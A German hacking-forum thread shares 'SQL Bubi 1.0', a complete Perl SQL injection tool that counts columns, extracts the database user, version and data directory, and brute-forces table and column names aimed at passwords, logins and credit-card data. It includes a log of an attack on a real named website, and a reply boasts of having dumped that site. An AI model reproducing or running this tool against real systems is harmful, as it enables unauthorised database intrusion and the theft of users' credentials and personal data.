Ich stelle euch hier ein schon etwas älteres Projekt von mir zur Verfügung. Da verschiedene SQL Injection Helper bei mir nicht besonders liefen, ganz abgesehen von Linux, habe ich mir selbst was dazu geschrieben.
Etwas besonderes ist es nicht, einfach nur hilfreich und nicht so abgefuckt wie schemafuzz
Funktionen sind in den Comments zu betrachten.
Bubi ist geschrieben in Perl
Zeilen gesamt -> ähm 310
Auf Wunsch bastel ich noch Proxy- und Threadunterstützung rein
Logfiles werden automatisch generiert und sollten alle wichtigen Informationen enthalten. Für Kritik und Codeverbesserungen bin ich offen
Intro
Logfile - Example:#!/usr/bin/perl
#-------------------------------------------------------------------#
# _ ___ _ ____
# (_)/ _ \| | |___ \
# _| | | | | __ __) |
# | | | | | |/ /|__ <
# | | |_| | < ___) |
# | |\___/|_|\_\____/
# _/ |
# |__/ SQL Injection Helper 1.0
#
#................................................. ...............
#
# + written by fred777
# + (C) 2010 by j0k3 project
# + fred777.5x.to
#
# .................................................. .............
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
# j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sqlp.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# .................................................. .............
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course
#
#-------------------------------------------------------------------#
Script:Code:+-------------------------------------------------------------+ | j0k3 SQL Injection Helper - Logfile | +-------------------------------------------------------------+ Columns:8 String: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,8--+ +-------------------------------------------------------------+ | j0k3 SQL Injection Helper - Logfile | +-------------------------------------------------------------+ Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,j0k3 User: leeger_zuckerm@localhost MySQL Version: 5.0.90-community Directory: /var/lib/mysql/ +-------------------------------------------------------------+ | j0k3 SQL Injection Helper - Logfile | +-------------------------------------------------------------+ Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,UNHEX(HEX(CONCAT_WS(0x3a,99999,table_name,column_name,99999)))+from+information_schema.columns Dumping Information: [0] CHARACTER_SETS:CHARACTER_SET_NAME [1] CHARACTER_SETS:DEFAULT_COLLATE_NAME [2] CHARACTER_SETS:DESCRIPTION [3] CHARACTER_SETS:MAXLEN [4] COLLATIONS:COLLATION_NAME [5] COLLATIONS:CHARACTER_SET_NAME [6] COLLATIONS:ID [7] COLLATIONS:IS_DEFAULT [8] COLLATIONS:IS_COMPILED [9] COLLATIONS:SORTLEN [10] COLLATION_CHARACTER_SET_APPLICABILITY:COLLATION_NAME [11] COLLATION_CHARACTER_SET_APPLICABILITY:CHARACTER_SET_NAME [12] COLUMNS:TABLE_CATALOG [13] COLUMNS:TABLE_SCHEMA [14] COLUMNS:TABLE_NAME +-------------------------------------------------------------+ | j0k3 SQL Injection Helper - Logfile | +-------------------------------------------------------------+ Url: http://zuckermais.ch/index.php?id=18+and+1=0+union+select+1,2,3,4,5,6,7,j0k3 Scanning Tables: + information_schema.columns -> Scanning Columns: - table_name - column_name
Code:#!/usr/bin/perl #-------------------------------------------------------------------# # _ ___ _ ____ # (_)/ _ \| | |___ \ # _| | | | | __ __) | # | | | | | |/ /|__ < # | | |_| | < ___) | # | |\___/|_|\_\____/ # _/ | # |__/ SQL Injection Helper 1.0 # #................................................................ # # + written by fred777 # + (C) 2010 by j0k3 project # + fred777.5x.to # # ............................................................... # DAMN INFORMATION SHIT # # + Column Counter # + SQL Data Grabber # + Name Information Fuzzer # # - Column Counter # - $ perl sql.pl -c <page> <true-word> # - $ perl sql.pl -c http://seite.de/?d=1 j0k3 # # - SQL Data Grabber # - $ perl sql.pl -d <page> # - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3 # - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1, # j0k3(table_name1,name2)+from+table # # - Name Information Fuzzer # - $ perl sql.pl -f <page> # - $ perl sqlp.pl -f http://seite.de/?d=-1+union+select+1,j0k3 # # ............................................................... # DAMN GREETZ # # + back2hack, free-hack, creative-coding, scene-coderz, hackbase # + darkc0de for the n1 table list # + and teh leet happy ninjas of course :P # #-------------------------------------------------------------------# use strict; use warnings; use LWP::UserAgent; print q { +-------------------------------------------------------------+ | SQL Injection Helper 1.0 | | | | + Column Counter | | + SQL Data Grabber | | + Name Information-Fuzzer | | | | < j0k3 > (C) by fred777 | +-------------------------------------------------------------+ }; $|++; our ($op,$url,$true) = @ARGV; our ($file,$lim) = ('log.txt',1000); our $ua = LWP::UserAgent->new(); my $head = "+-------------------------------------------------------------+\n". "| j0k3 SQL Injection Helper - Logfile |\n". "+-------------------------------------------------------------+\n"; usage() unless $op =~ m:^-d$|^-c$|^-f$:i; usage() unless $url =~ m.^http://.; writing($head); order() if($op eq '-c'); selects() if($op eq '-d'); fuzz() if($op eq '-f'); sub order { error() if(!$true); my ($resp,$i,$str) = (0,0,"$url+AND+1=0+UNION+SELECT+1"); do { $i++; $resp = $ua->get("$url+ORDER+BY+$i--+") or die "\n$!\n"; } while($resp->content =~ m:$true:i); $str .= ",$_" for (2..$i-1); printf("\nColumns: %d\nString: %s\n",$i-1,"$str--+"); writing("\nColumns:".($i-1)."\nString: $str--+\n\n"); } sub selects { if($url =~ m:.+j0k3: && $url !~ m:.+from.+:) { my $inf = 'UNHEX(HEX(CONCAT_WS(0x3a,99999,user(),version(),@@datadir,99999)))'; my $st = replace($url,'j0k3',$inf); my $resp = $ua->get("$st--+") or die "\n$!\n"; $resp->content =~ m![9]{5}:(.+):(.+):(.+):[9]{5}!i; my $t = "\nUrl: $url\n\nUser: $1\nMySQL Version: $2\nDirectory: $3\n\n"; print $t; writing($t); } elsif($url =~ m:.+from.+:i) { my ($c,$resp) = (0,0); $url =~ m:j0k3\((.+)\):i; my $str = "UNHEX(HEX(CONCAT_WS(0x3a,99999,$1,99999)))"; my $st = replace($url,'j0k3\('.$1.'\)',$str); print "\nDumping Information:\n\n"; writing("\nUrl: $st\n\nDumping Information:\n\n"); do { $resp = $ua->get("$st+LIMIT+$c,$lim--+") or die "\n$!\n"; $resp->content =~ m![9]{5}:(.*):[9]{5}!; print "[$c] $1\n"; writing("[$c] $1\n"); $c++; } while($resp->content =~ m![9]{5}:(.+):[9]{5}! && $resp->content !~ m:error:i); } else { error(); } } sub fuzz { my @tables =( 'user','admin','users','admins','account','accounts','adm','admin_login', 'member','memberlist','members','login_admin','login_admins','login_user', 'login_users','logins','logon','logs','admin_user','admin_userinfo','administer', 'administrable','administrate','administration','administrator','administrators', 'adminrights','adminuser','login','mambo_session','mambo_users','manage','Logins', 'manager','mb_users','mybb_users','e107.e107_user','e107_user','Admins','Login', 'phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users', 'tbladmins','sort','_wfspro_admin','4images_users','a_admin','art','article_admin', 'articles','artikel','aut','author','autore','backend','backend_users','backenduser', 'chat_config','chat_messages','chat_users','client','clients','clubconfig', 'company','config','contact','contacts','content', 'control','cpg_config', 'cpg132_users','customer','customers','customers_basket','dbadmins','dealer', 'dealers','diary','download','forum.ibf_members','fusion_user_groups', 'fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings', 'ibf_members','ibf_members_converge','ibf_sessions','icq','images','index', 'info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users', 'jos_comprofiler_members','jos_contact_details','jos_joomblog_users', 'jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici', 'kpro_adminlogs','kpro_user','links','lost_pass','lost_passwords','movie','movies', 'lostpass','lostpasswords','m_admin','main','minibbtable_users','mitglieder', 'mysql','mysql.user','name','names','news','news_lostpass','newsletter', 'nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users', 'obb_profiles','order','orders','parol','partner','partners','passes','password', 'passwords','perdorues','perdoruesit','phorum_session','phorum_user', 'phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user', 'punbb_users','pwd','pwds','reg_user','reg_users','registered','reguser','regusers', 'session','sessions','settings','shop.cards','shop.orders','site_login', 'site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members', 'SS_orders','statistics','superuser','sysadmin','sysadmins','system','sysuser', 'sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member', 'tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user', 'tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test', 'usebb_members','user_admin','user_info','user_list','user_login','user_logins', 'user_names','usercontrol','userinfo','userlist','userlogins','username','usernames', 'userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members', 'webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin', 'xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ActiveDataFeed', 'Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1', 'DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties', 'Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre', 'JamPass','MyTicketek','MyTicketekArchive','News','Promotion','Region', 'SearchOptions','Series','Sheldonshows','StateList','States','SubCategory', 'Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent', 'sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows', 'Ticket System Acc Numbers','TimeDiff','Titles','Total Members','UserPreferences', 'uvw_Category','uvw_Preferences','Venue','venues','VenuesNew','stone list', 'tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor', 'tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory', 'tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList', 'viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info', 'CC_username','cms_user','cms_users','cms_admin','cms_admins','user_name', 'jos_user','table_user','email','mail','bulletin','cc_info','login_name', 'admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin', ); my @columns = ( 'user','name','username','password','passwd','pass','benutzername','passwort', 'cc_number','id','email','pwd','user_name','customers_email_address', 'customers_password','user_password','user_pass','admin_user','admin_password', 'admin_pass','usern','user_n','username1','password1','email1','id1', 'users','login','logins','login_user','login_admin','login_username','user_username', 'user_login','auid','apwd','adminid','admin_id','adminuser','adminuserid', 'admin_userid','adminusername','admin_username','adminname','admin_name', 'usr','usr_n','usrname','usr_name','usrpass','usr_pass','usrnam','nc','uid', 'userid','user_id','myusername','mail','emni','logohu','punonjes','kpro_user', 'wp_users','emniplote','perdoruesi','perdorimi','punetoret','logini','llogaria', 'kodi','emer','ime','korisnik','korisnici','user1','administrator','text', 'administrator_name','mem_login','login_password','login_pass','login_passwd', 'login_pwd','sifra','lozinka','psw','pass1word','pass_word','passw','pass_w', 'user_passwd','userpass','userpassword','userpwd','user_pwd','useradmin', 'user_admin','mypassword','passwrd','admin_pwd','admin_passwd','mem_password', 'memlogin','e_mail','usrn','u_name','uname','mempassword','mem_pass', 'mem_passwd','mem_pwd','p_word','pword','p_assword','myname','my_username', 'my_name','my_password','my_email','cvvnumber','about','access','accnt', 'accnts','account','accounts','admin','adminemail','adminlogin','adminmail', 'admins','aid','aim','auth','authenticate','authentication','blog','cc_expires', 'cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername', 'conf','config','contact','converge_pass_hash','converge_pass_salt','crack', 'customer','customers','cvvnumber]','data','db_database_name','db_hostname', 'db_password','db_username','download','e-mail','emailaddress','full','gid', 'group','group_name','hash','hashsalt','homepage','icq','icq_number','id_group', 'id_member','images','index','ip_address','last_ip','last_login','lastname', 'log','login_name','login_pw','loginkey','loginout','logo','md5hash','member', 'member_id','member_login_key','member_name','memberid','membername','members', 'new','news','nick','number','nummer','pass_hash','passwordsalt','passwort', 'personal_key','phone','privacy','pw','pwrd','salt','search','secretanswer', 'secretquestion','serial','session_member_id','session_member_login_key','sesskey', 'setting','sid','spacer','status','store','store1','store2','store3','store4', 'table_prefix','temp_pass','temp_password','temppass','temppasword','text','un', 'user_email','user_icq','user_ip','user_level','user_passw','user_pw','user_pword', 'user_pwrd','user_un','user_uname','user_usernm','user_usernun','user_usrnm', 'userip','userlogin','usernm','userpw','usr2','usrnm','usrs','warez','xar_name', 'xar_pass'); print "\nUrl: $url\n"; writing("\nUrl: $url\n"); print "\nScanning Tables:\n"; writing("\nScanning Tables:\n"); foreach my $tab (@tables) { my $re = replace($url,'j0k3',9x5); my $resp = $ua->get("$re+FROM+$tab--+"); if($resp->content =~ m:[^,][9]{5}: && $resp->content !~ m:error:i) { print "+ $tab -> Scanning Columns:\n"; writing("+ $tab -> Scanning Columns:\n"); foreach my $col (@columns) { $re = replace($url,'j0k3',"CONCAT(99999,0x3a,$col)"); $resp = $ua->get("$re+FROM+$tab+LIMIT+0,1--+"); if($resp->content =~ m:[^(][9]{5}: && $resp->content !~ m:error:i) { print "- $col\n"; writing("- $col\n"); } } } } } sub replace { my ($str,$or,$re) = @_; $str =~ s/$or/$re/; return $str; } sub writing { my $text = shift; open FL,">>$file" or die "\n$!\n"; print FL $text; close FL; } sub error { print "+-------------------------------------------------------------+\n". "| Error: Read Usage! - \$ perl sql.pl |\n". "+-------------------------------------------------------------+\n"; exit; } sub usage { print q { +-------------------------------------------------------------+ | INFORMATION | +-------------------------------------------------------------+ | | | Column Counter: | | $ perl sql.pl -c <url> <true-word> | | $ perl sql.pl -c http://seite.de/?id=7 j0k3 | | | | SQL Data Grabber: | | $ perl sql.pl -d <url> | | $ perl sql.pl -d http://seite.de/?id=-7+union+select | | +1,j0k3 | | $ perl sql.pl -d http://seite.de/?id=-7+union+select+1, | | j0ke(column1,column2)+from+table | | | | Name Information Fuzzer: | | $perl sql.pl -f <url> | | $perl sql.pl -f http://seite.de/?id=-7+union+select | | +1,j0k3 | | | | < j0k3 > | +-------------------------------------------------------------+ }; exit; } # EOF - < j0k3 > - > 06.2010 - version 1.0
Ergebnis 1 bis 6 von 6
Thema: SQL Bubi 1.0
-
13.06.2010, 15:16 #1_fred_
- Registriert seit
- 20.08.2008
- Beiträge
- 1.967
SQL Bubi 1.0
Geändert von fred777 (13.06.2010 um 22:37 Uhr)
_n0p3_
-
Folgende Benutzer haben sich für diesen Beitrag bedankt:
moppelito (13.06.2010)
-
13.06.2010, 15:30 #2Stanley Jobson
- Registriert seit
- 27.07.2008
- Beiträge
- 691
Sieht gut aus (:
Teste es gleich mal.
Zuckermais.ch habe ich auch schon gedumped ^^.
I'm the one who will survive
The ones you eat alive
And nobody puts up a fight
I'll do what I wanna do
'Cause I wasn't built to lose..
-
13.06.2010, 15:33 #3_fred_
- Registriert seit
- 20.08.2008
- Beiträge
- 1.967
Ja, das diehnte nur zu Testzwecken.
Sollte aufgrund es Querys z.B. ein Hochkomma benötigt werden, muss dieses natürlich angepasst werden
bzw. das Wort 'j0k3' in den Sichtbereich eingefügt werden.._n0p3_
-
13.06.2010, 16:11 #4print<>=~y/0-9//,$/
- Registriert seit
- 01.02.2010
- Beiträge
- 468
OT: Was findest du so abgefuckt an shemafuzz?
+0x60Code:$_=<>;map$-+=$_,/./g;print$-,$/
-
13.06.2010, 16:44 #5_fred_
- Registriert seit
- 20.08.2008
- Beiträge
- 1.967
unsinnig viele Hilfsanweisungen
unübersichtlicher code, zumindest meißtens
Verschachtelte Options, was auch dazu führt, dass die ganzen Bedingungen übertrieben gehandhabt werden..
Ich bin zwar kein Pythonmeister, aber besonders durchdacht ist der Code wohl nie gewesen.
Wäre ich einer, wäre ich mir sicher, mir würde noch mehr dazu einfallen.._n0p3_
-
13.06.2010, 20:48 #6just call me n0va ^.^
- Registriert seit
- 03.01.2009
- Beiträge
- 979
rechtschreibfehler:
müsste eig. course hin# + and teh leet happy ninjas of cause
.:B:.
hilfe in jeglichen bereichen [ausser RAT support >.<]
Zitat von Starflow
Zitieren
